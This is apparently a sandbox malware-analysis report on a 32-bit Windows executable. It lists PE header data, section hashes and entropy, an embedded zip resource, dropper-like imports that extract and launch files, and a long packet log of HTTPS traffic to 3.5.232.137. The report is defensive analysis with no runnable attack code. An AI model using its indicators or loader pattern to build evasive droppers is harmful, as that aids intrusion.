                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x5F70D7D7 [Sun Sep 27 18:20:07 2020 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:6
                                                  OS Version Minor:0
                                                  File Version Major:6
                                                  File Version Minor:0
                                                  Subsystem Version Major:6
                                                  Subsystem Version Minor:0
                                                  Import Hash:e6f4169f2a5c3a8f93171d9f593bd22a
                                                  Name | Virtual Address | Virtual Size | Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2932c | 0x50 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x618fd0 | .rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x645000 | 0x190c | .reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x27720 | 0x70 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1f398 | 0x40 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x1f000 | 0x1a4 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x28ef0 | 0xe0 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                  .text | 0x1000 | 0x1d32b | 0x1d400 | 723597f58d5674921108e642a8e1b5b4 | False | 0.5962540064102564 | data | 6.658318567238198 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata | 0x1f000 | 0xacae | 0xae00 | fa1645fd03dda975b8bd67904b34af32 | False | 0.44526760057471265 | data | 4.948544868021258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data | 0x2a000 | 0x1870 | 0xe00 | f8724007e5d2ce85c65b5408a736d005 | False | 0.21484375 | data | 3.016754020922221 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc | 0x2c000 | 0x618fd0 | 0x619000 | ec7f9a989e7f06bc72b68f43d45b374e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc | 0x645000 | 0x190c | 0x1a00 | fca0dc86189b5b127d85095ebd6abd95 | False | 0.7630709134615384 | data | 6.514362877721557 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                  DATA | 0x2c340 | 0x616301 | Zip archive data, at least v2.0 to extract, compression method=deflate | English | United States | 1.0003108978271484
                                                  FLAGS | 0x642644 | 0xc | data | English | United States | 1.6666666666666667
                                                  RT_ICON | 0x642650 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.21774193548387097
                                                  RT_ICON | 0x642938 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.11597472924187725
                                                  RT_ICON | 0x6431e0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.21774193548387097
                                                  RT_ICON | 0x6434c8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.11597472924187725
                                                  RT_STRING | 0x643d70 | 0x418 | data | English | United States | 0.3148854961832061
                                                  RT_STRING | 0x644188 | 0x604 | data | English | United States | 0.21363636363636362
                                                  RT_STRING | 0x64478c | 0x152 | data | English | United States | 0.5591715976331361
                                                  RT_GROUP_ICON | 0x6448e0 | 0x22 | data | English | United States | 1.0588235294117647
                                                  RT_GROUP_ICON | 0x644904 | 0x22 | data | English | United States | 1.088235294117647
                                                  RT_VERSION | 0x644928 | 0x2c0 | data | English | United States | 0.4659090909090909
                                                  RT_MANIFEST | 0x644be8 | 0x3e7 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (939), with CRLF line terminators | English | United States | 0.5145145145145145
                                                  DLL | Import
                                                  KERNEL32.dll | LoadResource, FindResourceW, lstrlenW, GetProcAddress, GetModuleHandleW, DeleteCriticalSection, GetTempPathW, GetLastError, GetTempFileNameW, MoveFileW, WaitForSingleObject, GetExitCodeProcess, CloseHandle, DeleteFileW, GetModuleFileNameW, GetCurrentProcess, LoadLibraryW, FreeLibrary, InitializeCriticalSectionEx, GetFileAttributesW, CreateFileW, SetFilePointer, ReadFile, VerSetConditionMask, GetCurrentDirectoryW, MultiByteToWideChar, LocalFileTimeToFileTime, WideCharToMultiByte, CreateDirectoryW, WriteFile, SetFileTime, FreeResource, SizeofResource, LockResource, CreateProcessW, GetSystemDirectoryW, SetDefaultDllDirectories, GetCurrentThreadId, DecodePointer, RaiseException, LeaveCriticalSection, EnterCriticalSection, lstrcmpiW, LoadLibraryExW, GetConsoleMode, GetConsoleCP, SystemTimeToFileTime, VerifyVersionInfoW, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsDebuggerPresent, OutputDebugStringW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, GetModuleHandleExW, GetStdHandle, HeapFree, HeapAlloc, GetFileType, CompareStringW, LCMapStringW, HeapSize, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, SetStdHandle, GetStringTypeW, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, WriteConsoleW
                                                  SHLWAPI.dll | PathIsUNCW
                                                  COMCTL32.dll | InitCommonControlsEx
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Mar 7, 2024 10:47:31.002168894 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.002182961 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.002207994 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.002228975 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.002238035 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.002284050 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.002294064 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.002340078 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.003129005 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.003142118 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.003185034 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.003194094 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.003206015 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.003231049 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.003256083 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.003973007 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.004014015 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.004030943 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.004050016 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.004079103 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.004096031 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.004719973 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.004734993 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.004756927 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.004789114 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.004812002 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.004834890 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.004853964 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.005363941 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.005419970 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.005460024 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.005472898 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.005505085 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.005544901 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.006650925 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.006720066 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.006735086 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.006782055 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.007493973 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.007508039 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.007534027 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.007558107 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.007572889 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.007600069 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.007618904 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.008099079 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.008151054 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.008164883 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.008238077 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.008996964 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.009012938 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.009054899 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.009061098 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.009083033 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.009114981 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.009114981 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.009141922 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.009454012 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.009494066 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.009505033 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.009526968 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.009550095 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.009568930 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.009855032 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.009907961 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.009919882 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.009959936 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.010679007 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.010691881 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.010731936 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.010744095 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.010768890 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.010786057 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.011446953 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.011461020 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.011506081 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.011517048 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.011528015 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.011553049 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.011569023 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.012211084 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.012229919 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.012265921 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.012275934 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.012300968 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.012319088 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.012327909 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.012372017 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.012430906 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.012479067 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.012787104 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.012849092 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.012859106 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.012903929 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.013513088 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.013525963 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.013556004 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.013566971 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.013578892 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.013606071 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.013631105 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.014856100 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.014898062 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.014909983 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.014930964 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.014962912 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.014982939 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.015696049 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.015711069 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.015757084 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.015775919 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.015815973 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.015815973 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.015851021 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.015889883 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.016293049 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.016351938 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.016354084 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.016377926 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.016406059 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.016422033 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.016683102 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.016736984 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.016747952 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.016789913 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.017379045 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.017391920 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.017421007 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.017446041 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.017465115 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.017488003 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.017504930 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.018053055 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.018107891 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.018132925 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.018140078 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.018153906 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.018174887 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.018847942 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.018861055 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.018892050 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.018902063 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.018932104 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.018939972 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.018939972 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.018963099 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.018986940 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.019027948 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.019489050 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.019535065 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.019539118 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.019572973 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.020235062 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.020246983 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.020277977 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.020287037 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.020304918 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.020312071 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.020329952 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.020342112 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.021157026 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.021205902 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.021212101 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.021230936 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.021259069 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.021275043 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.021925926 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.021939993 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.021990061 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.021991014 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.022000074 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.022022963 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.022196054 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.022234917 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.022758007 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.022808075 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.022813082 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.022847891 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.023654938 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.023668051 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.023710012 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.023716927 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.023752928 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.023756027 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.023791075 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.024497032 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.024549007 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.024553061 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.024571896 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.024604082 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.025336981 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.025350094 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.025381088 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.025387049 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.025417089 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.025434017 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.025465965 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.025599003 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.025636911 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.025994062 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.026050091 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.026055098 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.026088953 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.026730061 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.026745081 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.026767969 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.026779890 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.026783943 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.026794910 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.026814938 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.027805090 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.027837038 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.027853012 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.027858973 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.027880907 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.027894020 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.028942108 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.028954983 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.028973103 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.029011011 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.029015064 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.029046059 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.029057980 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.029603004 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.029627085 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.029650927 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.029654026 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.029675007 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.029687881 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.030003071 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.030055046 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.030059099 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.030096054 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.030786991 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.030802011 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.030824900 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.030833006 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.030836105 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.030857086 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.030877113 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.031873941 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.031904936 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.031985998 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.350831985 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.350836992 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.350861073 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.350878954 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.351219893 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.351237059 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.351279974 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.351284981 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.351308107 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.351327896 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.351672888 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.351686001 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.351735115 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.351738930 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.351773024 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.351947069 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.351959944 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.351995945 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.351999044 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.352041006 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.352293015 CET443497053.5.232.137192.168.2.5
